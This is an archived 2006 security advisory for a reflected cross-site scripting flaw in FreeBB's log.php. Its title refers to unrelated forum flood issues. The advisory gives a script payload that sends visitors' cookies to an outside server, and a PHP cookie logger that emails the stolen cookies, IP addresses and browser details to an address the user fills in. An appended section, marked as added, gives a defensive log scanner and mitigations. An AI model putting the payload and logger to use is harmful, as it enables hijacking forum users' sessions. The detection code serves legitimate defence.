View Topic Flood phpBB, MercuryBoard, Vbulletin, Ipb

2006-05-25T00:00:00
ID SECURITYVULNS:DOC:12783
Type securityvulns
Reporter Securityvulns
Modified 2006-05-25T00:00:00

Description


       /      \
    \  \  ,,  /  /
     '-.`\()/`.-'
    .--_'(  )'_--.
   / /` /`""`\ `\ \           * SpiderZ ForumZ Security *
    |  |  ><  |  |
    \  \      /  /
        '.__.'

• XSS FreeBB (All Versions)
• Author: SpiderZ
• Site: http://www.spiderz.altervista.org
• Site 2: https://www.spiderz.netsons.org


XSS in FreeBB. Official FreeBB site: http://www.free-bb.com/fr/

Url : www.sitoweb.com/forum/log.php?log=avatar&sid=1&a=ma

XSS

nrw&la=">><script>document.location.replace('http://WWW.SITOWEB/FILE.php?c='+document.cookie);</script>

Url + xss : www.sitoweb.com/forum/log.php?log=avatar&sid=1&a=ma?nrw&la=">><script>document.location.replace('http://WWW.SITOWEB.COM/FILE.php?c='+document.cookie);</script>

Cookie logger (Exploit.php)

<?php
$ip = $_SERVER['REMOTE_ADDR'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$accept = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
$cookie = $_GET['c'];
$myemail = "LA TUA E-MAIL";
$today = date("l, F j, Y, g:i a");
$subject = "Xss fre-bb";
$message = "Xss free-bb Ip: $ip Cookie: $cookie Browser: $userAgent Lingua: $accept Url: $base Giorno & Ora : $today \n ";
$from = "From: $myemail\r\n";
mail($myemail, $subject, $message, $from);
?>


Edit: $myemail = "LA TUA E-MAIL";

e.g.: hacker@mail.com
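
For defenders, a request like the one above leaves a recognizable trace in web-server access logs. The following is an added example, not part of the original advisory: it scans constructed combined-format log lines for query parameters whose decoded value carries markup, as the la payload does. The sample lines, the host collector.example and the function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed access-log lines (combined log format); IPs and hosts are placeholders.
SAMPLE_LOG = [
    '198.51.100.7 - - [25/May/2006:10:01:02 +0000] "GET /forum/log.php?log=avatar&sid=1&a=ma HTTP/1.1" 200 5120',
    '198.51.100.9 - - [25/May/2006:10:03:40 +0000] "GET /forum/log.php?log=avatar&sid=1&a=ma'
    '&la=%22%3E%3E%3Cscript%3Edocument.location.replace(%27http://collector.example/FILE.php'
    '?c=%27%2Bdocument.cookie)%3B%3C/script%3E HTTP/1.1" 200 5300',
    '203.0.113.5 - - [25/May/2006:10:04:11 +0000] "GET /forum/log.php?log=avatar'
    '&la=%2522%253E%253Cscript%253Edocument.cookie%253C/script%253E HTTP/1.1" 200 5300',
    '198.51.100.7 - - [25/May/2006:10:05:00 +0000] "GET /forum/search.php?q=1+%3E+0 HTTP/1.1" 200 900',
]

# Client IP and request target from a common/combined log line.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" \d{3}')
# An opening/closing tag, a javascript: URL, or a cookie read inside a parameter value.
SUSPICIOUS = re.compile(r'<\s*/?\s*[a-z!]|javascript:|document\.cookie', re.I)


def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (bounded) so %253C is seen as '<'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan(lines):
    """Return (line_no, client_ip, path, parameter) for each suspicious parameter."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        m = LINE.match(line)
        if not m:
            continue  # not a request line we can parse
        client_ip, target = m.groups()
        path, _, query = target.partition('?')
        for name, value in parse_qsl(query, keep_blank_values=True):
            if SUSPICIOUS.search(fully_decode(value)):
                hits.append((line_no, client_ip, path, name))
    return hits


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print('line %d: %s -> %s parameter %r carries markup' % hit)
```

Log matching only sees payloads delivered in the query string. Encoding the parameter on output and marking the session cookie HttpOnly address the reflected script and the cookie read directly.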